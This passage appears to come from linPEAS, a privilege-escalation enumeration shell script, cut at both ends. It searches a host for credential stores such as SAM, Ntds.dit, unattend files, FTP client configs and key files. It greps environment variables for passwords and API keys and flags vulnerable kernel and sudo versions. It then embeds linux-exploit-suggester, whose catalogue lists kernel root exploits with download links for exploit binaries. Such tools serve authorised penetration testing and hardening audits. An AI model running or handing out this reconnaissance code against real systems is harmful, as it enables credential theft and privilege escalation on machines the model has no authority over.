"^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}media|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}private|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}.cache|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv"
| grep -E "access\.log$|error\.log$" | sort | uniq | head -n 70)
PSTORAGE_OTHER_INTERESTING=$(echo -e
"$FIND_SRV\n$FIND_VAR\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_TMP\n$FIND_OPT\n$FIND_CACHE\n$FIND_SBIN\n$FIND_SYSTEMD\n$FIND_RUN\n$FIND_CDROM\n$FIND_HOMESEARCH\n$FIND_USR\n$FIND_ETC\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_LIB64\n$FIND_MNT\n$FIND_LIB\n$FIND_CONCOURSE_AUTH\n$FIND_SNAP\n$FIND_LIB32\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_CONCOURSE_KEYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"
| grep -E
"^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}media|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}private|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}.cache|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv"
| grep -E
"\.bashrc$|\.google_authenticator$|hosts\.equiv$|\.lesshst$|\.plan$|\.profile$|\.recently-used\.xbel$|\.rhosts$|\.sudo_as_admin_successful$"
| sort | uniq | head -n 70) PSTORAGE_WINDOWS=$(echo -e
"$FIND_SRV\n$FIND_VAR\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_TMP\n$FIND_OPT\n$FIND_CACHE\n$FIND_SBIN\n$FIND_SYSTEMD\n$FIND_RUN\n$FIND_CDROM\n$FIND_HOMESEARCH\n$FIND_USR\n$FIND_ETC\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_LIB64\n$FIND_MNT\n$FIND_LIB\n$FIND_CONCOURSE_AUTH\n$FIND_SNAP\n$FIND_LIB32\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_CONCOURSE_KEYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"
| grep -E
"^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}media|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}private|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}.cache|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv"
| grep -E
".*\.rdg$|AppEvent\.Evt$|autounattend\.xml$|ConsoleHost_history\.txt$|FreeSSHDservice\.ini$|NetSetup\.log$|Ntds\.dit$|protecteduserkey\.bin$|RDCMan\.settings$|SAM$|SYSTEM$|SecEvent\.Evt$|appcmd\.exe$|bash\.exe$|datasources\.xml$|default\.sav$|drives\.xml$|groups\.xml$|https-xampp\.conf$|https\.conf$|iis6\.log$|index\.dat$|my\.cnf$|my\.ini$|ntuser\.dat$|pagefile\.sys$|printers\.xml$|recentservers\.xml$|scclient\.exe$|scheduledtasks\.xml$|security\.sav$|server\.xml$|setupinfo$|setupinfo\.bak$|sitemanager\.xml$|sites\.ini$|software$|software\.sav$|sysprep\.inf$|sysprep\.xml$|system\.sav$|unattend\.inf$|unattend\.txt$|unattend\.xml$|unattended\.xml$|wcx_ftp\.ini$|ws_ftp\.ini$|web.*\.config$|winscp\.ini$|wsl\.exe$|plum\.sqlite$"
| sort | uniq | head -n 70) PSTORAGE_DATABASE=$(echo -e
"$FIND_SRV\n$FIND_VAR\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_TMP\n$FIND_OPT\n$FIND_CACHE\n$FIND_SBIN\n$FIND_SYSTEMD\n$FIND_RUN\n$FIND_CDROM\n$FIND_HOMESEARCH\n$FIND_USR\n$FIND_ETC\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_LIB64\n$FIND_MNT\n$FIND_LIB\n$FIND_CONCOURSE_AUTH\n$FIND_SNAP\n$FIND_LIB32\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_CONCOURSE_KEYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"
| grep -v -E
'/man/|/usr/|/var/cache/|thumbcache|iconcache|IconCache|/man/|/usr/|/var/cache/'
| grep -E
"^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}media|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}private|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}.cache|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv"
| grep -E ".*\.db$|.*\.sqlite$|.*\.sqlite3$" | sort | uniq | head -n 70)
PSTORAGE_BACKUPS=$(echo -e
"$FIND_SRV\n$FIND_VAR\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_TMP\n$FIND_OPT\n$FIND_CACHE\n$FIND_SBIN\n$FIND_SYSTEMD\n$FIND_RUN\n$FIND_CDROM\n$FIND_HOMESEARCH\n$FIND_USR\n$FIND_ETC\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_LIB64\n$FIND_MNT\n$FIND_LIB\n$FIND_CONCOURSE_AUTH\n$FIND_SNAP\n$FIND_LIB32\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_CONCOURSE_KEYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"
| grep -E
"^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}media|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}private|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}.cache|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv"
| grep -E "backup$|backups$" | sort | uniq | head -n 70)
PSTORAGE_PASSWORD_FILES=$(echo -e
"$FIND_SRV\n$FIND_VAR\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_TMP\n$FIND_OPT\n$FIND_CACHE\n$FIND_SBIN\n$FIND_SYSTEMD\n$FIND_RUN\n$FIND_CDROM\n$FIND_HOMESEARCH\n$FIND_USR\n$FIND_ETC\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_LIB64\n$FIND_MNT\n$FIND_LIB\n$FIND_CONCOURSE_AUTH\n$FIND_SNAP\n$FIND_LIB32\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_CONCOURSE_KEYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"
| grep -E
"^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}media|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}private|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}.cache|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv"
| grep -E ".*password.*$|.*credential.*$|creds.*$|.*\.key$" | sort | uniq | head
-n 70) ##### POST SEARCH VARIABLES ##### backup_folders_row="$(echo
$PSTORAGE_BACKUPS | tr '\n' ' ')" printf ${YELLOW}"DONE\n"$NC echo "" fi if echo
$CHECKS | grep -q system_information; then print_title "System Information"
########################################### #-------------) System Info
(-------------# ########################################### #-- SY) OS
print_2title "Operative system" print_info
"https://book.hacktricks.xyz/linux-hardening/privilege-escalation#kernel-exploits"
(cat /proc/version || uname -a ) 2>/dev/null | sed -${E}
"s,$kernelDCW_Ubuntu_Precise_1,${SED_RED_YELLOW}," | sed -${E}
"s,$kernelDCW_Ubuntu_Precise_2,${SED_RED_YELLOW}," | sed -${E}
"s,$kernelDCW_Ubuntu_Precise_3,${SED_RED_YELLOW}," | sed -${E}
"s,$kernelDCW_Ubuntu_Precise_4,${SED_RED_YELLOW}," | sed -${E}
"s,$kernelDCW_Ubuntu_Precise_5,${SED_RED_YELLOW}," | sed -${E}
"s,$kernelDCW_Ubuntu_Precise_6,${SED_RED_YELLOW}," | sed -${E}
"s,$kernelDCW_Ubuntu_Trusty_1,${SED_RED_YELLOW}," | sed -${E}
"s,$kernelDCW_Ubuntu_Trusty_2,${SED_RED_YELLOW}," | sed -${E}
"s,$kernelDCW_Ubuntu_Trusty_3,${SED_RED_YELLOW}," | sed -${E}
"s,$kernelDCW_Ubuntu_Trusty_4,${SED_RED_YELLOW}," | sed -${E}
"s,$kernelDCW_Ubuntu_Xenial,${SED_RED_YELLOW}," | sed -${E}
"s,$kernelDCW_Rhel5_1,${SED_RED_YELLOW}," | sed -${E}
"s,$kernelDCW_Rhel5_2,${SED_RED_YELLOW}," | sed -${E}
"s,$kernelDCW_Rhel5_3,${SED_RED_YELLOW}," | sed -${E}
"s,$kernelDCW_Rhel6_1,${SED_RED_YELLOW}," | sed -${E}
"s,$kernelDCW_Rhel6_2,${SED_RED_YELLOW}," | sed -${E}
"s,$kernelDCW_Rhel6_3,${SED_RED_YELLOW}," | sed -${E}
"s,$kernelDCW_Rhel6_4,${SED_RED_YELLOW}," | sed -${E}
"s,$kernelDCW_Rhel7,${SED_RED_YELLOW}," | sed -${E} "s,$kernelB,${SED_RED},"
warn_exec lsb_release -a 2>/dev/null if [ "$MACPEAS" ]; then warn_exec
system_profiler SPSoftwareDataType fi echo "" #-- SY) Sudo print_2title "Sudo
version" if [ "$(command -v sudo 2>/dev/null)" ]; then print_info
"https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-version"
sudo -V 2>/dev/null | grep "Sudo ver" | sed -${E} "s,$sudovB,${SED_RED}," else
echo_not_found "sudo" fi echo "" #--SY) USBCreator if (busctl list 2>/dev/null |
grep -q com.ubuntu.USBCreator) || [ "$DEBUG" ]; then print_2title "USBCreator"
print_info
"https://book.hacktricks.xyz/linux-hardening/privilege-escalation/d-bus-enumeration-and-command-injection-privilege-escalation"
pc_version=$(dpkg -l 2>/dev/null | grep policykit-desktop-privileges | grep -oP
"[0-9][0-9a-zA-Z\.]+") if [ -z "$pc_version" ]; then pc_version=$(apt-cache
policy policykit-desktop-privileges 2>/dev/null | grep -oP "\*\*\*.*" | cut -d"
" -f2) fi if [ -n "$pc_version" ]; then pc_length=${#pc_version} pc_major=$(echo
"$pc_version" | cut -d. -f1) pc_minor=$(echo "$pc_version" | cut -d. -f2) if [
"$pc_length" -eq 4 ] && [ "$pc_major" -eq 0 ] && [ "$pc_minor" -lt 21 ]; then
echo "Vulnerable!!" | sed -${E} "s,.*,${SED_RED}," fi fi fi echo "" #-- SY) PATH
print_2title "PATH" print_info
"https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-path-abuses"
if ! [ "$IAMROOT" ]; then echo "$OLDPATH" 2>/dev/null | sed -${E}
"s,$Wfolders|\./|\.:|:\.,${SED_RED_YELLOW},g" fi if [ "$DEBUG" ]; then echo "New
path exported: $PATH" fi echo "" #-- SY) Date print_2title "Date & uptime"
warn_exec date 2>/dev/null warn_exec uptime 2>/dev/null echo "" #-- SY) System
stats if [ "$EXTRA_CHECKS" ]; then print_2title "System stats" (df -h || lsblk)
2>/dev/null || echo_not_found "df and lsblk" warn_exec free 2>/dev/null echo ""
fi #-- SY) CPU info if [ "$EXTRA_CHECKS" ]; then print_2title "CPU info"
warn_exec lscpu 2>/dev/null echo "" fi if [ -d "/dev" ] || [ "$DEBUG" ] ; then
print_2title "Any sd*/disk* disk in /dev? (limit 20)" ls /dev 2>/dev/null | grep
-Ei "^sd|^disk" | sed "s,crypt,${SED_RED}," | head -n 20 echo "" fi if [ -f
"/etc/fstab" ] || [ "$DEBUG" ]; then print_2title "Unmounted file-system?"
print_info "Check if you can mount umounted devices" grep -v "^#" /etc/fstab
2>/dev/null | grep -Ev "\W+\#|^#" | sed -${E} "s,$mountG,${SED_GREEN},g" | sed
-${E} "s,$notmounted,${SED_RED},g" | sed -${E} "s%$mounted%${SED_BLUE}%g" | sed
-${E} "s,$Wfolders,${SED_RED}," | sed -${E} "s,$mountpermsB,${SED_RED},g" | sed
-${E} "s,$mountpermsG,${SED_GREEN},g" echo "" fi if ([ "$(command -v diskutil)"
] || [ "$DEBUG" ]) && [ "$EXTRA_CHECKS" ]; then print_2title "Mounted disks
information" warn_exec diskutil list echo "" fi if [ "$(command -v smbutil)" ]
|| [ "$DEBUG" ]; then print_2title "Mounted SMB Shares" warn_exec smbutil
statshares -a echo "" fi #-- SY) Environment vars print_2title "Environment"
print_info "Any private information inside environment variables?" (env ||
printenv || set) 2>/dev/null | grep -v
"RELEVANT*|FIND*|^VERSION=|dbuslistG|mygroups|ldsoconfdG|pwd_inside_history|kernelDCW_Ubuntu_Precise|kernelDCW_Ubuntu_Trusty|kernelDCW_Ubuntu_Xenial|kernelDCW_Rhel|^sudovB=|^rootcommon=|^mounted=|^mountG=|^notmounted=|^mountpermsB=|^mountpermsG=|^kernelB=|^C=|^RED=|^GREEN=|^Y=|^B=|^NC=|TIMEOUT=|groupsB=|groupsVB=|knw_grps=|sidG|sidB=|sidVB=|sidVB2=|sudoB=|sudoG=|sudoVB=|timersG=|capsB=|notExtensions=|Wfolders=|writeB=|writeVB=|_usrs=|compiler=|PWD=|LS_COLORS=|pathshG=|notBackup=|processesDump|processesB|commonrootdirs|USEFUL_SOFTWARE|PSTORAGE_KUBERNETES"
| sed -${E}
"s,[pP][wW][dD]|[pP][aA][sS][sS][wW]|[aA][pP][iI][kK][eE][yY]|[aA][pP][iI][_][kK][eE][yY]|KRB5CCNAME,${SED_RED},g"
|| echo_not_found "env || set" echo "" #-- SY) Dmesg if [ "$(command -v dmesg
2>/dev/null)" ] || [ "$DEBUG" ]; then print_2title "Searching Signature
verification failed in dmesg" print_info
"https://book.hacktricks.xyz/linux-hardening/privilege-escalation#dmesg-signature-verification-failed"
(dmesg 2>/dev/null | grep "signature") || echo_not_found "dmesg" echo "" fi #--
SY) Kernel extensions if [ "$MACPEAS" ]; then print_2title "Kernel Extensions
not belonging to apple" kextstat 2>/dev/null | grep -Ev " com.apple."
print_2title "Unsigned Kernel Extensions" macosNotSigned /Library/Extensions
macosNotSigned /System/Library/Extensions fi if [ "$(command -v bash
2>/dev/null)" ]; then print_2title "Executing Linux Exploit Suggester"
print_info "https://github.com/mzet-/linux-exploit-suggester"
les_b64="#!/bin/bash

#
# Copyright (c) 2016-2023, https://github.com/mzet-
#
# linux-exploit-suggester.sh comes with ABSOLUTELY NO WARRANTY.
# This is free software, and you are welcome to redistribute it
# under the terms of the GNU General Public License. See LICENSE
# file for usage of this software.
#

VERSION=v1.1

# bash colors
#txtred="\e[0;31m"
txtred="\e[91;1m"
txtgrn="\e[1;32m"
txtgray="\e[0;37m"
txtblu="\e[0;36m"
txtrst="\e[0m"
bldwht='\e[1;37m'
wht='\e[0;36m'
bldblu='\e[1;34m'
yellow='\e[1;93m'
lightyellow='\e[0;93m'

# input data
UNAME_A=""

# parsed data for current OS
KERNEL=""
OS=""
DISTRO=""
ARCH=""
PKG_LIST=""

# kernel config
KCONFIG=""

CVELIST_FILE=""

opt_fetch_bins=false
opt_fetch_srcs=false
opt_kernel_version=false
opt_uname_string=false
opt_pkglist_file=false
opt_cvelist_file=false
opt_checksec_mode=false
opt_full=false
opt_summary=false
opt_kernel_only=false
opt_userspace_only=false
opt_show_dos=false
opt_skip_more_checks=false
opt_skip_pkg_versions=false

ARGS=
SHORTOPTS="hVfbsu:k:dp:g"
LONGOPTS="help,version,full,fetch-binaries,fetch-sources,uname:,kernel:,show-dos,pkglist-file:,short,kernelspace-only,userspace-only,skip-more-checks,skip-pkg-versions,cvelist-file:,checksec"

## exploits database
declare -a EXPLOITS
declare -a EXPLOITS_USERSPACE

## temporary array for purpose of sorting exploits (based on exploits' rank)
declare -a exploits_to_sort
declare -a SORTED_EXPLOITS

############ LINUX KERNELSPACE EXPLOITS ####################
n=0

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2004-1235]${txtrst} elflbl
Reqs: pkg=linux-kernel,ver=2.4.29
Tags:
Rank: 1
analysis-url: http://isec.pl/vulnerabilities/isec-0021-uselib.txt
bin-url: https://web.archive.org/web/20111103042904/http://tarantula.by.ru/localroot/2.6.x/elflbl
exploit-db: 744
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2004-1235]${txtrst} uselib()
Reqs: pkg=linux-kernel,ver=2.4.29
Tags:
Rank: 1
analysis-url: http://isec.pl/vulnerabilities/isec-0021-uselib.txt
exploit-db: 778
Comments: Known to work only for 2.4 series (even though 2.6 is also vulnerable)
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2004-1235]${txtrst} krad3
Reqs: pkg=linux-kernel,ver>=2.6.5,ver<=2.6.11
Tags:
Rank: 1
exploit-db: 1397
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2004-0077]${txtrst} mremap_pte
Reqs: pkg=linux-kernel,ver>=2.6.0,ver<=2.6.2
Tags:
Rank: 1
exploit-db: 160
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2006-2451]${txtrst} raptor_prctl
Reqs: pkg=linux-kernel,ver>=2.6.13,ver<=2.6.17
Tags:
Rank: 1
exploit-db: 2031
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2006-2451]${txtrst} prctl
Reqs: pkg=linux-kernel,ver>=2.6.13,ver<=2.6.17
Tags:
Rank: 1
exploit-db: 2004
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2006-2451]${txtrst} prctl2
Reqs: pkg=linux-kernel,ver>=2.6.13,ver<=2.6.17
Tags:
Rank: 1
exploit-db: 2005
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2006-2451]${txtrst} prctl3
Reqs: pkg=linux-kernel,ver>=2.6.13,ver<=2.6.17
Tags:
Rank: 1
exploit-db: 2006
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2006-2451]${txtrst} prctl4
Reqs: pkg=linux-kernel,ver>=2.6.13,ver<=2.6.17
Tags:
Rank: 1
exploit-db: 2011
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2006-3626]${txtrst} h00lyshit
Reqs: pkg=linux-kernel,ver>=2.6.8,ver<=2.6.16
Tags:
Rank: 1
bin-url: https://web.archive.org/web/20111103042904/http://tarantula.by.ru/localroot/2.6.x/h00lyshit
exploit-db: 2013
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2008-0600]${txtrst} vmsplice1
Reqs: pkg=linux-kernel,ver>=2.6.17,ver<=2.6.24
Tags:
Rank: 1
exploit-db: 5092
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2008-0600]${txtrst} vmsplice2
Reqs: pkg=linux-kernel,ver>=2.6.23,ver<=2.6.24
Tags:
Rank: 1
exploit-db: 5093
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2008-4210]${txtrst} ftrex
Reqs: pkg=linux-kernel,ver>=2.6.11,ver<=2.6.22
Tags:
Rank: 1
exploit-db: 6851
Comments: world-writable sgid directory and shell that does not drop sgid privs upon exec (ash/sash) are required
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2008-4210]${txtrst} exit_notify
Reqs: pkg=linux-kernel,ver>=2.6.25,ver<=2.6.29
Tags:
Rank: 1
exploit-db: 8369
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2009-2692]${txtrst} sock_sendpage (simple version)
Reqs: pkg=linux-kernel,ver>=2.6.0,ver<=2.6.30
Tags: ubuntu=7.10,RHEL=4,fedora=4|5|6|7|8|9|10|11
Rank: 1
exploit-db: 9479
Comments: Works for systems with /proc/sys/vm/mmap_min_addr equal to 0
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2009-2692,CVE-2009-1895]${txtrst} sock_sendpage
Reqs: pkg=linux-kernel,ver>=2.6.0,ver<=2.6.30
Tags: ubuntu=9.04
Rank: 1
analysis-url: https://xorl.wordpress.com/2009/07/16/cve-2009-1895-linux-kernel-per_clear_on_setid-personality-bypass/
src-url: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/9435.tgz
exploit-db: 9435
Comments: /proc/sys/vm/mmap_min_addr needs to equal 0 OR pulseaudio needs to be installed
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2009-2692,CVE-2009-1895]${txtrst} sock_sendpage2
Reqs: pkg=linux-kernel,ver>=2.6.0,ver<=2.6.30
Tags: 
Rank: 1
src-url: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/9436.tgz
exploit-db: 9436
Comments: Works for systems with /proc/sys/vm/mmap_min_addr equal to 0
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2009-2692,CVE-2009-1895]${txtrst} sock_sendpage3
Reqs: pkg=linux-kernel,ver>=2.6.0,ver<=2.6.30
Tags: 
Rank: 1
src-url: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/9641.tar.gz
exploit-db: 9641
Comments: /proc/sys/vm/mmap_min_addr needs to equal 0 OR pulseaudio needs to be installed
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2009-2692,CVE-2009-1895]${txtrst} sock_sendpage (ppc)
Reqs: pkg=linux-kernel,ver>=2.6.0,ver<=2.6.30
Tags: ubuntu=8.10,RHEL=4|5
Rank: 1
exploit-db: 9545
Comments: /proc/sys/vm/mmap_min_addr needs to equal 0
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2009-2698]${txtrst} the rebel (udp_sendmsg)
Reqs: pkg=linux-kernel,ver>=2.6.1,ver<=2.6.19
Tags: debian=4
Rank: 1
src-url: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/9574.tgz
exploit-db: 9574
analysis-url: https://blog.cr0.org/2009/08/cve-2009-2698-udpsendmsg-vulnerability.html
author: spender
Comments: /proc/sys/vm/mmap_min_addr needs to equal 0 OR pulseaudio needs to be installed
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2009-2698]${txtrst} hoagie_udp_sendmsg
Reqs: pkg=linux-kernel,ver>=2.6.1,ver<=2.6.19,x86
Tags: debian=4
Rank: 1
exploit-db: 9575
analysis-url: https://blog.cr0.org/2009/08/cve-2009-2698-udpsendmsg-vulnerability.html
author: andi
Comments: Works for systems with /proc/sys/vm/mmap_min_addr equal to 0
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2009-2698]${txtrst} katon (udp_sendmsg)
Reqs: pkg=linux-kernel,ver>=2.6.1,ver<=2.6.19,x86
Tags: debian=4
Rank: 1
src-url: https://github.com/Kabot/Unix-Privilege-Escalation-Exploits-Pack/raw/master/2009/CVE-2009-2698/katon.c
analysis-url: https://blog.cr0.org/2009/08/cve-2009-2698-udpsendmsg-vulnerability.html
author: VxHell Labs
Comments: Works for systems with /proc/sys/vm/mmap_min_addr equal to 0
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2009-2698]${txtrst} ip_append_data
Reqs: pkg=linux-kernel,ver>=2.6.1,ver<=2.6.19,x86
Tags: fedora=4|5|6,RHEL=4
Rank: 1
analysis-url: https://blog.cr0.org/2009/08/cve-2009-2698-udpsendmsg-vulnerability.html
exploit-db: 9542
author: p0c73n1
Comments: Works for systems with /proc/sys/vm/mmap_min_addr equal to 0
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2009-3547]${txtrst} pipe.c 1
Reqs: pkg=linux-kernel,ver>=2.6.0,ver<=2.6.31
Tags:
Rank: 1
exploit-db: 33321
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2009-3547]${txtrst} pipe.c 2
Reqs: pkg=linux-kernel,ver>=2.6.0,ver<=2.6.31
Tags:
Rank: 1
exploit-db: 33322
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2009-3547]${txtrst} pipe.c 3
Reqs: pkg=linux-kernel,ver>=2.6.0,ver<=2.6.31
Tags:
Rank: 1
exploit-db: 10018
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2010-3301]${txtrst} ptrace_kmod2
Reqs: pkg=linux-kernel,ver>=2.6.26,ver<=2.6.34
Tags: debian=6.0{kernel:2.6.(32|33|34|35)-(1|2|trunk)-amd64},ubuntu=(10.04|10.10){kernel:2.6.(32|35)-(19|21|24)-server}
Rank: 1
bin-url: https://web.archive.org/web/20111103042904/http://tarantula.by.ru/localroot/2.6.x/kmod2
bin-url: https://web.archive.org/web/20111103042904/http://tarantula.by.ru/localroot/2.6.x/ptrace-kmod
bin-url: https://web.archive.org/web/20160602192641/https://www.kernel-exploits.com/media/ptrace_kmod2-64
exploit-db: 15023
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2010-1146]${txtrst} reiserfs
Reqs: pkg=linux-kernel,ver>=2.6.18,ver<=2.6.34
Tags: ubuntu=9.10
Rank: 1
analysis-url: https://jon.oberheide.org/blog/2010/04/10/reiserfs-reiserfs_priv-vulnerability/
src-url: https://jon.oberheide.org/files/team-edward.py
exploit-db: 12130
comments: Requires a ReiserFS filesystem mounted with extended attributes
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2010-2959]${txtrst} can_bcm
Reqs: pkg=linux-kernel,ver>=2.6.18,ver<=2.6.36
Tags: ubuntu=10.04{kernel:2.6.32-24-generic}
Rank: 1
bin-url: https://web.archive.org/web/20160602192641/https://www.kernel-exploits.com/media/can_bcm
exploit-db: 14814
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2010-3904]${txtrst} rds
Reqs: pkg=linux-kernel,ver>=2.6.30,ver<2.6.37
Tags: debian=6.0{kernel:2.6.(31|32|34|35)-(1|trunk)-amd64},ubuntu=10.10|9.10,fedora=13{kernel:2.6.33.3-85.fc13.i686.PAE},ubuntu=10.04{kernel:2.6.32-(21|24)-generic}
Rank: 1
analysis-url: http://www.securityfocus.com/archive/1/514379
src-url: http://web.archive.org/web/20101020044048/http://www.vsecurity.com/download/tools/linux-rds-exploit.c
bin-url: https://web.archive.org/web/20160602192641/https://www.kernel-exploits.com/media/rds
bin-url: https://web.archive.org/web/20160602192641/https://www.kernel-exploits.com/media/rds64
exploit-db: 15285
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2010-3848,CVE-2010-3850,CVE-2010-4073]${txtrst} half_nelson
Reqs: pkg=linux-kernel,ver>=2.6.0,ver<=2.6.36
Tags: ubuntu=(10.04|9.10){kernel:2.6.(31|32)-(14|21)-server}
Rank: 1
bin-url: http://web.archive.org/web/20160602192631/https://www.kernel-exploits.com/media/half-nelson3
exploit-db: 17787
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[N/A]${txtrst} caps_to_root
Reqs: pkg=linux-kernel,ver>=2.6.34,ver<=2.6.36,x86
Tags: ubuntu=10.10
Rank: 1
exploit-db: 15916
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[N/A]${txtrst} caps_to_root 2
Reqs: pkg=linux-kernel,ver>=2.6.34,ver<=2.6.36
Tags: ubuntu=10.10
Rank: 1
exploit-db: 15944
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2010-4347]${txtrst} american-sign-language
Reqs: pkg=linux-kernel,ver>=2.6.0,ver<=2.6.36
Tags:
Rank: 1
exploit-db: 15774
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2010-3437]${txtrst} pktcdvd
Reqs: pkg=linux-kernel,ver>=2.6.0,ver<=2.6.36
Tags: ubuntu=10.04
Rank: 1
exploit-db: 15150
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2010-3081]${txtrst} video4linux
